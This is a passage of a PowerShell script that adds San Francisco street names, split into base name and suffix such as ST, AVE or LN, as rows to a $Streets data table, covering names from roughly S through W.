ST","","SHRADER","ST") + $null = $Streets.Rows.Add("SIBERT LN","","SIBERT","LN") + $null = $Streets.Rows.Add("SIBERT LOOP","","SIBERT","LOOP") + $null = $Streets.Rows.Add("SIBLEY RD","","SIBLEY","RD") + $null = $Streets.Rows.Add("SICKLES AVE","","SICKLES","AVE") + $null = $Streets.Rows.Add("SIERRA ST","","SIERRA","ST") + $null = $Streets.Rows.Add("SIGNAL RD","","SIGNAL","RD") + $null = $Streets.Rows.Add("SILLIMAN ST","","SILLIMAN","ST") + $null = $Streets.Rows.Add("SILVER AVE","","SILVER","AVE") + $null = $Streets.Rows.Add("SILVERVIEW DR","","SILVERVIEW","DR") + $null = $Streets.Rows.Add("SIMONDS LOOP","","SIMONDS","LOOP") + $null = $Streets.Rows.Add("INDIES PL","","INDIES","PL") + $null = $Streets.Rows.Add("SKYLINE BLVD","","SKYLINE","BLVD") + $null = $Streets.Rows.Add("SKYVIEW WAY","","SKYVIEW","WAY") + $null = $Streets.Rows.Add("SLOAT BLVD","","SLOAT","BLVD") + $null = $Streets.Rows.Add("SMITH LN","","SMITH","LN") + $null = $Streets.Rows.Add("SOLA AVE","","SOLA","AVE") + $null = $Streets.Rows.Add("SOMERSET ST","","SOMERSET","ST") + $null = $Streets.Rows.Add("SONOMA ST","","SONOMA","ST") + $null = $Streets.Rows.Add("SOTELO AVE","","SOTELO","AVE") + $null = $Streets.Rows.Add("SOULE LN","","SOULE","LN") + $null = $Streets.Rows.Add("SOUTH DR","","SOUTH","DR") + $null = $Streets.Rows.Add("DUNLIN LN","","DUNLIN","LN") + $null = $Streets.Rows.Add("SOUTH GATE RD","","SOUTH GATE","RD") + $null = $Streets.Rows.Add("SOUTH HILL BLVD","","SOUTH HILL","BLVD") + $null = $Streets.Rows.Add("SOUTH HUGHES LN","","SOUTH HUGHES","LN") + $null = $Streets.Rows.Add("SOUTH PARK","","SOUTH PARK","") + $null = $Streets.Rows.Add("SOUTH VAN HORN LN","","SOUTH VAN HORN","LN") + $null = $Streets.Rows.Add("SOUTH VAN NESS AVE","","SOUTH VAN NESS","AVE") + $null = $Streets.Rows.Add("SOUTHARD PL","","SOUTHARD","PL") + $null = $Streets.Rows.Add("SOUTHERN HEIGHTS AVE","","SOUTHERN HEIGHTS","AVE") + $null = $Streets.Rows.Add("SOUTHWOOD DR","","SOUTHWOOD","DR") + $null = $Streets.Rows.Add("SPARROW ST","","SPARROW","ST") + $null = $Streets.Rows.Add("SPARTA ST","","SPARTA","ST") + $null = $Streets.Rows.Add("SPEAR AVE","","SPEAR","AVE") + $null = $Streets.Rows.Add("SPEAR ST","","SPEAR","ST") + $null = $Streets.Rows.Add("SPENCER ST","","SPENCER","ST") + $null = $Streets.Rows.Add("SPOFFORD ST","","SPOFFORD","ST") + $null = $Streets.Rows.Add("SPRECKELS LAKE DR","","SPRECKELS LAKE","DR") + $null = $Streets.Rows.Add("SPRING ST","","SPRING","ST") + $null = $Streets.Rows.Add("SPRINGFIELD DR","","SPRINGFIELD","DR") + $null = $Streets.Rows.Add("SPROULE LN","","SPROULE","LN") + $null = $Streets.Rows.Add("SPRUCE ST","","SPRUCE","ST") + $null = $Streets.Rows.Add("STANDISH AVE","","STANDISH","AVE") + $null = $Streets.Rows.Add("STANFORD ST","","STANFORD","ST") + $null = $Streets.Rows.Add("STANFORD HEIGHTS AVE","","STANFORD HEIGHTS","AVE") + $null = $Streets.Rows.Add("STANLEY ST","","STANLEY","ST") + $null = $Streets.Rows.Add("STANTON ST","","STANTON","ST") + $null = $Streets.Rows.Add("STANYAN BLVD","","STANYAN","BLVD") + $null = $Streets.Rows.Add("STANYAN ST","","STANYAN","ST") + $null = $Streets.Rows.Add("STAPLES AVE","","STAPLES","AVE") + $null = $Streets.Rows.Add("ZOE DELL LN","","ZOE DELL","LN") + $null = $Streets.Rows.Add("STARK ST","","STARK","ST") + $null = $Streets.Rows.Add("STARR KING WAY","","STARR KING","WAY") + $null = $Streets.Rows.Add("STARVIEW WAY","","STARVIEW","WAY") + $null = $Streets.Rows.Add("STATE DR","","STATE","DR") + $null = $Streets.Rows.Add("STATES ST","","STATES","ST") + $null = $Streets.Rows.Add("STEINER ST","","STEINER","ST") + $null = $Streets.Rows.Add("STERLING ST","","STERLING","ST") + $null = $Streets.Rows.Add("STERN GROVE CT","","STERN GROVE","CT") + $null = $Streets.Rows.Add("STERNBERG RD","","STERNBERG","RD") + $null = $Streets.Rows.Add("STEUART ST","","STEUART","ST") + $null = $Streets.Rows.Add("STEUBEN ST","","STEUBEN","ST") + $null = $Streets.Rows.Add("STEVELOE PL","","STEVELOE","PL") + $null = $Streets.Rows.Add("STEVENSON ST","","STEVENSON","ST") + $null = $Streets.Rows.Add("STILL ST","","STILL","ST") + $null = $Streets.Rows.Add("STILLINGS AVE","","STILLINGS","AVE") + $null = $Streets.Rows.Add("STILLMAN ST","","STILLMAN","ST") + $null = $Streets.Rows.Add("STILWELL RD","","STILWELL","RD") + $null = $Streets.Rows.Add("STOCKTON ST","","STOCKTON","ST") + $null = $Streets.Rows.Add("STOCKTON TUNL","","STOCKTON","TUNL") + $null = $Streets.Rows.Add("STONE ST","","STONE","ST") + $null = $Streets.Rows.Add("STONECREST DR","","STONECREST","DR") + $null = $Streets.Rows.Add("STONEMAN ST","","STONEMAN","ST") + $null = $Streets.Rows.Add("STONERIDGE LN","","STONERIDGE","LN") + $null = $Streets.Rows.Add("STONEYBROOK AVE","","STONEYBROOK","AVE") + $null = $Streets.Rows.Add("STONEYFORD AVE","","STONEYFORD","AVE") + $null = $Streets.Rows.Add("STOREY AVE","","STOREY","AVE") + $null = $Streets.Rows.Add("STORRIE ST","","STORRIE","ST") + $null = $Streets.Rows.Add("STOW LAKE DR","","STOW LAKE","DR") + $null = $Streets.Rows.Add("STRATFORD DR","","STRATFORD","DR") + $null = $Streets.Rows.Add("STRIPED BASS ST","","STRIPED BASS","ST") + $null = $Streets.Rows.Add("STURGEON ST","","STURGEON","ST") + $null = $Streets.Rows.Add("SUMMIT ST","","SUMMIT","ST") + $null = $Streets.Rows.Add("SUMMIT WAY","","SUMMIT","WAY") + $null = $Streets.Rows.Add("SUMNER AVE","","SUMNER","AVE") + $null = $Streets.Rows.Add("SUMNER ST","","SUMNER","ST") + $null = $Streets.Rows.Add("SUNBEAM LN","","SUNBEAM","LN") + $null = $Streets.Rows.Add("SUNGLOW LN","","SUNGLOW","LN") + $null = $Streets.Rows.Add("SUNNYDALE AVE","","SUNNYDALE","AVE") + $null = $Streets.Rows.Add("SUNNYSIDE TER","","SUNNYSIDE","TER") + $null = $Streets.Rows.Add("SUNRISE WAY","","SUNRISE","WAY") + $null = $Streets.Rows.Add("SUNSET BLVD","","SUNSET","BLVD") + $null = $Streets.Rows.Add("SUNSET BLVD OFF RAMP","","SUNSET BLVD OFF","RAMP") + $null = $Streets.Rows.Add("SUNSET BLVD ON RAMP","","SUNSET BLVD ON","RAMP") + $null = $Streets.Rows.Add("SUNVIEW DR","","SUNVIEW","DR") + $null = $Streets.Rows.Add("SURREY ST","","SURREY","ST") + $null = $Streets.Rows.Add("SUSSEX ST","","SUSSEX","ST") + $null = $Streets.Rows.Add("SUTRO HEIGHTS AVE","","SUTRO HEIGHTS","AVE") + $null = $Streets.Rows.Add("SUTTER ST","","SUTTER","ST") + $null = $Streets.Rows.Add("SWEENY ST","","SWEENY","ST") + $null = $Streets.Rows.Add("SWISS AVE","","SWISS","AVE") + $null = $Streets.Rows.Add("SYCAMORE ST","","SYCAMORE","ST") + $null = $Streets.Rows.Add("SYDNEY WAY","","SYDNEY","WAY") + $null = $Streets.Rows.Add("SYLVAN DR","","SYLVAN","DR") + $null = $Streets.Rows.Add("TABER PL","","TABER","PL") + $null = $Streets.Rows.Add("TACOMA ST","","TACOMA","ST") + $null = $Streets.Rows.Add("GOLDEN BELL WAY","","GOLDEN BELL","WAY") + $null = $Streets.Rows.Add("TALBERT ST","","TALBERT","ST") + $null = $Streets.Rows.Add("TAMALPAIS TER","","TAMALPAIS","TER") + $null = $Streets.Rows.Add("TAMPA LN","","TAMPA","LN") + $null = $Streets.Rows.Add("TANDANG SORA","","TANDANG SORA","") + $null = $Streets.Rows.Add("TAPIA DR","","TAPIA","DR") + $null = $Streets.Rows.Add("TARA ST","","TARA","ST") + $null = $Streets.Rows.Add("TARAVAL ST","","TARAVAL","ST") + $null = $Streets.Rows.Add("TAYLOR RD","","TAYLOR","RD") + $null = $Streets.Rows.Add("TAYLOR ST","","TAYLOR","ST") + $null = $Streets.Rows.Add("TEDDY AVE","","TEDDY","AVE") + $null = $Streets.Rows.Add("TEHAMA ST","","TEHAMA","ST") + $null = $Streets.Rows.Add("TELEGRAPH PL","","TELEGRAPH","PL") + $null = $Streets.Rows.Add("TELEGRAPH HILL BLVD","","TELEGRAPH HILL","BLVD") + $null = $Streets.Rows.Add("TEMESCAL TER","","TEMESCAL","TER") + $null = $Streets.Rows.Add("TEMPLE ST","","TEMPLE","ST") + $null = $Streets.Rows.Add("TENNESSEE ST","","TENNESSEE","ST") + $null = $Streets.Rows.Add("TENNY PL","","TENNY","PL") + $null = $Streets.Rows.Add("TERESITA BLVD","","TERESITA","BLVD") + $null = $Streets.Rows.Add("TERRA VISTA AVE","","TERRA VISTA","AVE") + $null = $Streets.Rows.Add("TERRACE DR","","TERRACE","DR") + $null = $Streets.Rows.Add("TERRACE WALK","","TERRACE","WALK") + $null = $Streets.Rows.Add("TERRY A FRANCOIS BLVD","","TERRY A FRANCOIS","BLVD") + $null = $Streets.Rows.Add("TEVIS ST","","TEVIS","ST") + $null = $Streets.Rows.Add("TEXAS ST","","TEXAS","ST") + $null = $Streets.Rows.Add("THE EMBARCADERO","","THE EMBARCADERO","") + $null = $Streets.Rows.Add("THERESA ST","","THERESA","ST") + $null = $Streets.Rows.Add("THOMAS AVE","","THOMAS","AVE") + $null = $Streets.Rows.Add("THOMAS CT","","THOMAS","CT") + $null = $Streets.Rows.Add("THOMAS MELLON CIR","","THOMAS MELLON","CIR") + $null = $Streets.Rows.Add("THOMAS MELLON DR","","THOMAS MELLON","DR") + $null = $Streets.Rows.Add("THOMAS MORE WAY","","THOMAS MORE","WAY") + $null = $Streets.Rows.Add("THOR AVE","","THOR","AVE") + $null = $Streets.Rows.Add("THORNBURG RD","","THORNBURG","RD") + $null = $Streets.Rows.Add("THORNE WAY","","THORNE","WAY") + $null = $Streets.Rows.Add("THORNTON AVE","","THORNTON","AVE") + $null = $Streets.Rows.Add("THORP LN","","THORP","LN") + $null = $Streets.Rows.Add("THRIFT ST","","THRIFT","ST") + $null = $Streets.Rows.Add("TIFFANY AVE","","TIFFANY","AVE") + $null = $Streets.Rows.Add("TILLMAN PL","","TILLMAN","PL") + $null = $Streets.Rows.Add("TIMOTHY PFLUEGER PL","","TIMOTHY PFLUEGER","PL") + $null = $Streets.Rows.Add("TINGLEY ST","","TINGLEY","ST") + $null = $Streets.Rows.Add("TIOGA AVE","","TIOGA","AVE") + $null = $Streets.Rows.Add("TOCOLOMA AVE","","TOCOLOMA","AVE") + $null = $Streets.Rows.Add("TODD ST","","TODD","ST") + $null = $Streets.Rows.Add("TOLAND ST","","TOLAND","ST") + $null = $Streets.Rows.Add("TOLEDO WAY","","TOLEDO","WAY") + $null = $Streets.Rows.Add("TOLL PLAZA TUNNEL","","TOLL PLAZA TUNNEL","") + $null = $Streets.Rows.Add("TOMASO CT","","TOMASO","CT") + $null = $Streets.Rows.Add("TOMPKINS AVE","","TOMPKINS","AVE") + $null = $Streets.Rows.Add("TONQUIN ST","","TONQUIN","ST") + $null = $Streets.Rows.Add("TOPAZ WAY","","TOPAZ","WAY") + $null = $Streets.Rows.Add("TOPEKA AVE","","TOPEKA","AVE") + $null = $Streets.Rows.Add("TORNEY AVE","","TORNEY","AVE") + $null = $Streets.Rows.Add("TORRENS CT","","TORRENS","CT") + $null = $Streets.Rows.Add("TOUCHARD ST","","TOUCHARD","ST") + $null = $Streets.Rows.Add("TOWERSIDE AVE","","TOWERSIDE","AVE") + $null = $Streets.Rows.Add("TOWNSEND ST","","TOWNSEND","ST") + $null = $Streets.Rows.Add("TOYON LN","","TOYON","LN") + $null = $Streets.Rows.Add("TRADER VIC ALY","","TRADER VIC","ALY") + $null = $Streets.Rows.Add("TRAINOR ST","","TRAINOR","ST") + $null = $Streets.Rows.Add("TRANSBAY HUMP","","TRANSBAY HUMP","") + $null = $Streets.Rows.Add("TRANSBAY LOOP","","TRANSBAY LOOP","") + $null = $Streets.Rows.Add("TRANSVERSE DR","","TRANSVERSE","DR") + $null = $Streets.Rows.Add("TREASURE ISLAND RD","","TREASURE ISLAND","RD") + $null = $Streets.Rows.Add("TREASURY PL","","TREASURY","PL") + $null = $Streets.Rows.Add("TREAT AVE","","TREAT","AVE") + $null = $Streets.Rows.Add("TREAT LN","","TREAT","LN") + $null = $Streets.Rows.Add("TREAT WAY","","TREAT","WAY") + $null = $Streets.Rows.Add("TRENTON ST","","TRENTON","ST") + $null = $Streets.Rows.Add("TRINITY ST","","TRINITY","ST") + $null = $Streets.Rows.Add("TROY ALY","","TROY","ALY") + $null = $Streets.Rows.Add("TRUBY ST","","TRUBY","ST") + $null = $Streets.Rows.Add("TRUETT ST","","TRUETT","ST") + $null = $Streets.Rows.Add("TRUMBULL ST","","TRUMBULL","ST") + $null = $Streets.Rows.Add("TUBBS ST","","TUBBS","ST") + $null = $Streets.Rows.Add("TUCKER AVE","","TUCKER","AVE") + $null = $Streets.Rows.Add("TULANE ST","","TULANE","ST") + $null = $Streets.Rows.Add("TULARE ST","","TULARE","ST") + $null = $Streets.Rows.Add("TULIP ALY","","TULIP","ALY") + $null = $Streets.Rows.Add("TUNNEL AVE","","TUNNEL","AVE") + $null = $Streets.Rows.Add("TURK BLVD","","TURK","BLVD") + $null = $Streets.Rows.Add("TURK ST","","TURK","ST") + $null = $Streets.Rows.Add("TURK MURPHY LN","","TURK MURPHY","LN") + $null = $Streets.Rows.Add("TURNER TER","","TURNER","TER") + $null = $Streets.Rows.Add("TURQUOISE WAY","","TURQUOISE","WAY") + $null = $Streets.Rows.Add("TUSCANY ALY","","TUSCANY","ALY") + $null = $Streets.Rows.Add("TWIN PEAKS BLVD","","TWIN PEAKS","BLVD") + $null = $Streets.Rows.Add("ULLOA ST","","ULLOA","ST") + $null = $Streets.Rows.Add("UNDERWOOD AVE","","UNDERWOOD","AVE") + $null = $Streets.Rows.Add("UNION ST","","UNION","ST") + $null = $Streets.Rows.Add("UNITED NATIONS PLZ","","UNITED NATIONS","PLZ") + $null = $Streets.Rows.Add("UNIVERSITY ST","","UNIVERSITY","ST") + $null = $Streets.Rows.Add("UNNAMED 009","","UNNAMED 009","") + $null = $Streets.Rows.Add("UNNAMED 010","","UNNAMED 010","") + $null = $Streets.Rows.Add("UNNAMED 011","","UNNAMED 011","") + $null = $Streets.Rows.Add("UNNAMED 012","","UNNAMED 012","") + $null = $Streets.Rows.Add("UNNAMED 014","","UNNAMED 014","") + $null = $Streets.Rows.Add("UNNAMED 017","","UNNAMED 017","") + $null = $Streets.Rows.Add("UNNAMED 018","","UNNAMED 018","") + $null = $Streets.Rows.Add("UNNAMED 021","","UNNAMED 021","") + $null = $Streets.Rows.Add("UNNAMED 024","","UNNAMED 024","") + $null = $Streets.Rows.Add("UNNAMED 025","","UNNAMED 025","") + $null = $Streets.Rows.Add("UNNAMED 026","","UNNAMED 026","") + $null = $Streets.Rows.Add("UNNAMED 027","","UNNAMED 027","") + $null = $Streets.Rows.Add("UNNAMED 030","","UNNAMED 030","") + $null = $Streets.Rows.Add("UNNAMED 031","","UNNAMED 031","") + $null = $Streets.Rows.Add("UNNAMED 032","","UNNAMED 032","") + $null = $Streets.Rows.Add("UNNAMED 033","","UNNAMED 033","") + $null = $Streets.Rows.Add("UNNAMED 034","","UNNAMED 034","") + $null = $Streets.Rows.Add("UNNAMED 035","","UNNAMED 035","") + $null = $Streets.Rows.Add("UNNAMED 036","","UNNAMED 036","") + $null = $Streets.Rows.Add("UNNAMED 037","","UNNAMED 037","") + $null = $Streets.Rows.Add("UNNAMED 038","","UNNAMED 038","") + $null = $Streets.Rows.Add("UNNAMED 039","","UNNAMED 039","") + $null = $Streets.Rows.Add("UNNAMED 040","","UNNAMED 040","") + $null = $Streets.Rows.Add("UNNAMED 041","","UNNAMED 041","") + $null = $Streets.Rows.Add("UNNAMED 042","","UNNAMED 042","") + $null = $Streets.Rows.Add("UNNAMED 043","","UNNAMED 043","") + $null = $Streets.Rows.Add("UNNAMED 044","","UNNAMED 044","") + $null = $Streets.Rows.Add("UNNAMED 051","","UNNAMED 051","") + $null = $Streets.Rows.Add("UNNAMED 052","","UNNAMED 052","") + $null = $Streets.Rows.Add("UNNAMED 053","","UNNAMED 053","") + $null = $Streets.Rows.Add("UNNAMED 064","","UNNAMED 064","") + $null = $Streets.Rows.Add("UNNAMED 065","","UNNAMED 065","") + $null = $Streets.Rows.Add("UNNAMED 068","","UNNAMED 068","") + $null = $Streets.Rows.Add("UNNAMED 069","","UNNAMED 069","") + $null = $Streets.Rows.Add("UNNAMED 070","","UNNAMED 070","") + $null = $Streets.Rows.Add("UNNAMED 071","","UNNAMED 071","") + $null = $Streets.Rows.Add("UNNAMED 075","","UNNAMED 075","") + $null = $Streets.Rows.Add("UNNAMED 077","","UNNAMED 077","") + $null = $Streets.Rows.Add("UNNAMED 078","","UNNAMED 078","") + $null = $Streets.Rows.Add("UNNAMED 080","","UNNAMED 080","") + $null = $Streets.Rows.Add("UNNAMED 083","","UNNAMED 083","") + $null = $Streets.Rows.Add("UNNAMED 084","","UNNAMED 084","") + $null = $Streets.Rows.Add("UNNAMED 087","","UNNAMED 087","") + $null = $Streets.Rows.Add("UNNAMED 088","","UNNAMED 088","") + $null = $Streets.Rows.Add("UNNAMED 090","","UNNAMED 090","") + $null = $Streets.Rows.Add("UNNAMED 095","","UNNAMED 095","") + $null = $Streets.Rows.Add("UNNAMED 096","","UNNAMED 096","") + $null = $Streets.Rows.Add("UNNAMED 097","","UNNAMED 097","") + $null = $Streets.Rows.Add("UNNAMED 098","","UNNAMED 098","") + $null = $Streets.Rows.Add("UNNAMED 099","","UNNAMED 099","") + $null = $Streets.Rows.Add("UNNAMED 100","","UNNAMED 100","") + $null = $Streets.Rows.Add("UNNAMED 101","","UNNAMED 101","") + $null = $Streets.Rows.Add("UNNAMED 105","","UNNAMED 105","") + $null = $Streets.Rows.Add("UNNAMED 106","","UNNAMED 106","") + $null = $Streets.Rows.Add("UNNAMED 107","","UNNAMED 107","") + $null = $Streets.Rows.Add("UNNAMED 108","","UNNAMED 108","") + $null = $Streets.Rows.Add("UNNAMED 112","","UNNAMED 112","") + $null = $Streets.Rows.Add("UNNAMED 113","","UNNAMED 113","") + $null = $Streets.Rows.Add("UNNAMED 115","","UNNAMED 115","") + $null = $Streets.Rows.Add("UNNAMED 117","","UNNAMED 117","") + $null = $Streets.Rows.Add("UNNAMED 119","","UNNAMED 119","") + $null = $Streets.Rows.Add("UNNAMED 120","","UNNAMED 120","") + $null = $Streets.Rows.Add("UNNAMED 124","","UNNAMED 124","") + $null = $Streets.Rows.Add("UNNAMED 128","","UNNAMED 128","") + $null = $Streets.Rows.Add("UNNAMED 129","","UNNAMED 129","") + $null = $Streets.Rows.Add("UNNAMED 139","","UNNAMED 139","") + $null = $Streets.Rows.Add("UNNAMED 142","","UNNAMED 142","") + $null = $Streets.Rows.Add("UNNAMED 144","","UNNAMED 144","") + $null = $Streets.Rows.Add("UNNAMED 145","","UNNAMED 145","") + $null = $Streets.Rows.Add("UNNAMED 146","","UNNAMED 146","") + $null = $Streets.Rows.Add("UNNAMED 148","","UNNAMED 148","") + $null = $Streets.Rows.Add("UNNAMED 150","","UNNAMED 150","") + $null = $Streets.Rows.Add("UNNAMED 151","","UNNAMED 151","") + $null = $Streets.Rows.Add("UNNAMED 152","","UNNAMED 152","") + $null = $Streets.Rows.Add("UNNAMED 153","","UNNAMED 153","") + $null = $Streets.Rows.Add("UNNAMED 161","","UNNAMED 161","") + $null = $Streets.Rows.Add("UNNAMED 163","","UNNAMED 163","") + $null = $Streets.Rows.Add("UNNAMED 165","","UNNAMED 165","") + $null = $Streets.Rows.Add("UNNAMED 185","","UNNAMED 185","") + $null = $Streets.Rows.Add("UNNAMED 186","","UNNAMED 186","") + $null = $Streets.Rows.Add("UNNAMED 187","","UNNAMED 187","") + $null = $Streets.Rows.Add("UNNAMED 188","","UNNAMED 188","") + $null = $Streets.Rows.Add("UNNAMED 2","","UNNAMED 2","") + $null = $Streets.Rows.Add("UPLAND DR","","UPLAND","DR") + $null = $Streets.Rows.Add("UPPER TER","","UPPER","TER") + $null = $Streets.Rows.Add("UPPER SERVICE RD","","UPPER SERVICE","RD") + $null = $Streets.Rows.Add("UPTON AVE","","UPTON","AVE") + $null = $Streets.Rows.Add("UPTON ST","","UPTON","ST") + $null = $Streets.Rows.Add("URANUS TER","","URANUS","TER") + $null = $Streets.Rows.Add("URBANO DR","","URBANO","DR") + $null = $Streets.Rows.Add("UTAH ST","","UTAH","ST") + $null = $Streets.Rows.Add("VALDEZ AVE","","VALDEZ","AVE") + $null = $Streets.Rows.Add("VALE AVE","","VALE","AVE") + $null = $Streets.Rows.Add("VALENCIA ST","","VALENCIA","ST") + $null = $Streets.Rows.Add("VALERTON CT","","VALERTON","CT") + $null = $Streets.Rows.Add("VALLEJO ST","","VALLEJO","ST") + $null = $Streets.Rows.Add("VALLETTA CT","","VALLETTA","CT") + $null = $Streets.Rows.Add("VALLEY ST","","VALLEY","ST") + $null = $Streets.Rows.Add("VALMAR TER","","VALMAR","TER") + $null = $Streets.Rows.Add("VALPARAISO ST","","VALPARAISO","ST") + $null = $Streets.Rows.Add("VAN BUREN ST","","VAN BUREN","ST") + $null = $Streets.Rows.Add("VAN DYKE AVE","","VAN DYKE","AVE") + $null = $Streets.Rows.Add("VAN KEUREN AVE","","VAN KEUREN","AVE") + $null = $Streets.Rows.Add("VAN NESS AVE","","VAN NESS","AVE") + $null = $Streets.Rows.Add("VANDEWATER ST","","VANDEWATER","ST") + $null = $Streets.Rows.Add("CRAVATH ST","","CRAVATH","ST") + $null = $Streets.Rows.Add("VARELA AVE","","VARELA","AVE") + $null = $Streets.Rows.Add("VARENNES ST","","VARENNES","ST") + $null = $Streets.Rows.Add("VARNEY PL","","VARNEY","PL") + $null = $Streets.Rows.Add("VASQUEZ AVE","","VASQUEZ","AVE") + $null = $Streets.Rows.Add("VASSAR PL","","VASSAR","PL") + $null = $Streets.Rows.Add("VEGA ST","","VEGA","ST") + $null = $Streets.Rows.Add("VELASCO AVE","","VELASCO","AVE") + $null = $Streets.Rows.Add("VENARD ALY","","VENARD","ALY") + $null = $Streets.Rows.Add("VENTURA AVE","","VENTURA","AVE") + $null = $Streets.Rows.Add("VENUS ST","","VENUS","ST") + $null = $Streets.Rows.Add("VER MEHR PL","","VER MEHR","PL") + $null = $Streets.Rows.Add("VERDI PL","","VERDI","PL") + $null = $Streets.Rows.Add("VERDUN WAY","","VERDUN","WAY") + $null = $Streets.Rows.Add("VERMONT ST","","VERMONT","ST") + $null = $Streets.Rows.Add("VERNA ST","","VERNA","ST") + $null = $Streets.Rows.Add("VERNON ST","","VERNON","ST") + $null = $Streets.Rows.Add("VESTA ST","","VESTA","ST") + $null = $Streets.Rows.Add("VETERANS DR","","VETERANS","DR") + $null = $Streets.Rows.Add("VIA BUFANO","","VIA BUFANO","") + $null = $Streets.Rows.Add("VIA FERLINGHETTI","","VIA FERLINGHETTI","") + $null = $Streets.Rows.Add("VICENTE ST","","VICENTE","ST") + $null = $Streets.Rows.Add("VICKSBURG ST","","VICKSBURG","ST") + $null = $Streets.Rows.Add("VICTORIA ST","","VICTORIA","ST") + $null = $Streets.Rows.Add("VIDAL DR","","VIDAL","DR") + $null = $Streets.Rows.Add("VIENNA ST","","VIENNA","ST") + $null = $Streets.Rows.Add("VILLA TER","","VILLA","TER") + $null = $Streets.Rows.Add("VINE TER","","VINE","TER") + $null = $Streets.Rows.Add("VINTON CT","","VINTON","CT") + $null = $Streets.Rows.Add("VIRGIL ST","","VIRGIL","ST") + $null = $Streets.Rows.Add("VIRGINIA AVE","","VIRGINIA","AVE") + $null = $Streets.Rows.Add("VISITACION AVE","","VISITACION","AVE") + $null = $Streets.Rows.Add("VISTA CT","","VISTA","CT") + $null = $Streets.Rows.Add("VISTA LN","","VISTA","LN") + $null = $Streets.Rows.Add("VISTA VERDE CT","","VISTA VERDE","CT") + $null = $Streets.Rows.Add("VISTA VIEW CT","","VISTA VIEW","CT") + $null = $Streets.Rows.Add("VON SCHMIDT ST","","VON SCHMIDT","ST") + $null = $Streets.Rows.Add("VULCAN STWY","","VULCAN","STWY") + $null = $Streets.Rows.Add("WABASH TER","","WABASH","TER") + $null = $Streets.Rows.Add("WAGNER ALY","","WAGNER","ALY") + $null = $Streets.Rows.Add("WAITHMAN WAY","","WAITHMAN","WAY") + $null = $Streets.Rows.Add("WALBRIDGE ST","","WALBRIDGE","ST") + $null = $Streets.Rows.Add("WALDO ALY","","WALDO","ALY") + $null = $Streets.Rows.Add("WALKER CT","","WALKER","CT") + $null = $Streets.Rows.Add("WALKWAY","","WALKWAY","") + $null = $Streets.Rows.Add("WALL PL","","WALL","PL") + $null = $Streets.Rows.Add("WALLACE AVE","","WALLACE","AVE") + $null = $Streets.Rows.Add("WALLEN ST","","WALLEN","ST") + $null = $Streets.Rows.Add("WALLER ST","","WALLER","ST") + $null = $Streets.Rows.Add("WALNUT ST","","WALNUT","ST") + $null = $Streets.Rows.Add("WALTER ST","","WALTER","ST") + $null = $Streets.Rows.Add("WALTER U LUM PL","","WALTER U LUM","PL") + $null = $Streets.Rows.Add("WALTHAM ST","","WALTHAM","ST") + $null = $Streets.Rows.Add("WANDA ST","","WANDA","ST") + $null = $Streets.Rows.Add("WARD ST","","WARD","ST") + $null = $Streets.Rows.Add("WARE ST","","WARE","ST") + $null = $Streets.Rows.Add("WARNER PL","","WARNER","PL") + $null = $Streets.Rows.Add("WARREN DR","","WARREN","DR") + $null = $Streets.Rows.Add("WASHBURN ST","","WASHBURN","ST") + $null = $Streets.Rows.Add("WASHINGTON BLVD","","WASHINGTON","BLVD") + $null = $Streets.Rows.Add("WASHINGTON ST","","WASHINGTON","ST") + $null = $Streets.Rows.Add("WATCHMAN WAY","","WATCHMAN","WAY") + $null = $Streets.Rows.Add("WATER ST","","WATER","ST") + $null = $Streets.Rows.Add("WATERLOO ST","","WATERLOO","ST") + $null = $Streets.Rows.Add("WATERVILLE ST","","WATERVILLE","ST") + $null = $Streets.Rows.Add("WATT AVE","","WATT","AVE") + $null = $Streets.Rows.Add("WATTSON PL","","WATTSON","PL") + $null = $Streets.Rows.Add("WAVERLY PL","","WAVERLY","PL") + $null = $Streets.Rows.Add("WAWONA ST","","WAWONA","ST") + $null = $Streets.Rows.Add("WAYLAND ST","","WAYLAND","ST") + $null = $Streets.Rows.Add("WAYNE PL","","WAYNE","PL") + $null = $Streets.Rows.Add("WEBB PL","","WEBB","PL") + $null = $Streets.Rows.Add("WEBSTER ST","","WEBSTER","ST") + $null = $Streets.Rows.Add("WEDEMEYER ST","","WEDEMEYER","ST") + $null = $Streets.Rows.Add("WELDON ST","","WELDON","ST") + $null = $Streets.Rows.Add("WELSH ST","","WELSH","ST") + $null = $Streets.Rows.Add("WENTWORTH PL","","WENTWORTH","PL") + $null = $Streets.Rows.Add("WEST RD","","WEST","RD") + $null = $Streets.Rows.Add("WEST BROADWAY","","WEST BROADWAY","") + $null = $Streets.Rows.Add("WEST CLAY ST","","WEST CLAY","ST") + $null = $Streets.Rows.Add("WEST CRYSTAL COVE TER","","WEST CRYSTAL COVE","TER") + $null = $Streets.Rows.Add("WEST HALLECK ST","","WEST HALLECK","ST") + $null = $Streets.Rows.Add("WEST PACIFIC AVE","","WEST PACIFIC","AVE") + $null = $Streets.Rows.Add("WEST POINT RD","","WEST POINT","RD") + $null = $Streets.Rows.Add("WEST PORTAL AVE","","WEST PORTAL","AVE") + $null = $Streets.Rows.Add("WEST VIEW AVE","","WEST VIEW","AVE") + $null = $Streets.Rows.Add("WESTBROOK CT","","WESTBROOK","CT") + $null = $Streets.Rows.Add("WESTERN SHORE LN","","WESTERN SHORE","LN") + $null = $Streets.Rows.Add("WESTGATE DR","","WESTGATE","DR") + $null = $Streets.Rows.Add("WESTMOORLAND DR","","WESTMOORLAND","DR") + $null = $Streets.Rows.Add("WESTON CT","","WESTON","CT") + $null = $Streets.Rows.Add("WESTSIDE DR","","WESTSIDE","DR") + $null = $Streets.Rows.Add("WESTWOOD DR","","WESTWOOD","DR") + $null = $Streets.Rows.Add("WETMORE ST","","WETMORE","ST") + $null = $Streets.Rows.Add("WHEAT ST","","WHEAT","ST") + $null = $Streets.Rows.Add("WHEELER AVE","","WHEELER","AVE") + $null = $Streets.Rows.Add("WHIPPLE AVE","","WHIPPLE","AVE") + $null = $Streets.Rows.Add("WHITE ST","","WHITE","ST") + $null = $Streets.Rows.Add("WHITECLIFF WAY","","WHITECLIFF","WAY") + $null = $Streets.Rows.Add("WHITFIELD CT","","WHITFIELD","CT") + $null = $Streets.Rows.Add("WHITING ST","","WHITING","ST") + $null = $Streets.Rows.Add("WHITING WAY","","WHITING","WAY") + $null = $Streets.Rows.Add("WHITNEY ST","","WHITNEY","ST") + $null = $Streets.Rows.Add("WHITNEY YOUNG CIR","","WHITNEY YOUNG","CIR") + $null = $Streets.Rows.Add("WHITTIER ST","","WHITTIER","ST") + $null = $Streets.Rows.Add("WIESE ST","","WIESE","ST") + $null = $Streets.Rows.Add("WILDE AVE","","WILDE","AVE") + $null = $Streets.Rows.Add("WILDER 